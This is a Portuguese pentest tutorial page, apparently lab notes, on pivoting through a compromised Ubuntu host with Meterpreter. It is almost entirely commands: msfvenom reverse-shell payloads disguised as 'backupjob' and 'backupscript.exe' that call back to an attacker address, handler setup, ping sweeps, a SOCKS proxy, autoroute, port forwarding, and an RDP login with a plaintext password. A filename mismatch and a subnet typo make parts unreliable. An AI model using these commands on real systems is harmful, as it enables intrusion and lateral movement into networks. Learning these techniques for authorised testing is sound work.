Meterpreter Tunneling & Port Forwarding

Agora, vamos considerar um cenário em que temos nosso acesso ao shell Meterpreter no servidor Ubuntu (o host pivot), e queremos executar varreduras de enumeração por meio do host pivot, mas gostaríamos de aproveitar as conveniências que as sessões Meterpreter nos trazem. Nesses casos, ainda podemos criar um pivot com nossa sessão Meterpreter sem depender do encaminhamento de porta SSH. Podemos criar um shell Meterpreter para o servidor Ubuntu com o comando abaixo, que retornará um shell em nosso host de ataque na porta 8080.

Criando Payload para o Ubuntu Pivot Host

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080

Configurando e iniciando o multi/handler

msfconsole -q
use exploit/multi/handler
set lhost 0.0.0.0
set lport 8080
set payload linux/x64/meterpreter/reverse_tcp
run

Podemos copiar o backupjobarquivo binário para o host pivot do Ubuntu over SSHe executá-lo para obter uma sessão do Meterpreter.

scp backupscript ubuntu@<ipAddressofTarget>:~/

Executando a carga útil no host Pivot

chmod +x backupjob 
./backupjob

Precisamos ter certeza de que a sessão do Meterpreter foi estabelecida com sucesso ao executar a carga útil.
Varredura de ping

run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

Ping Sweep For Loop em hosts Linux Pivot

for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

Varredura de ping para loop usando CMD

for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

Varredura de ping usando PowerShell

1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

Configurando o proxy SOCKS do MSF

use auxiliary/server/socks_proxy
set SRVPORT 9050
set SRVHOST 0.0.0.0
set version 4a
run

Confirmando que o servidor proxy está em execução

> jobs

Criando rotas com AutoRoute

use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run

Também é possível adicionar rotas com autoroute executando autoroute na sessão Meterpreter.

run autoroute -s 172.16.5.0/23

Listando rotas ativas com AutoRoute

run autoroute -p

Testando a funcionalidade de proxy e roteamento

proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

Encaminhamento de porta

Opções de Portfwd

help portfwd

Criando um Relay TCP Local

portfwd add -l 3300 -p 3389 -r 172.16.5.19

Conectando ao Windows Target por meio do localhost

xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Saída Netstat

netstat -antp

Meterpreter Reverso Port Forwarding

Regras de encaminhamento de porta reversa

portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

Configurando e iniciando multi/handler

bg
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 8081 
set LHOST 0.0.0.0 
run

Gerando a carga útil do Windows

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234

Por fim, se executarmos nossa carga útil no host Windows, poderemos receber um shell do Windows dinamizado por meio do servidor Ubuntu.

PreviousRemote/Reverse Port Forwarding with SSH NextSocat Redirection with a Reverse Shell

Last updated 8 months ago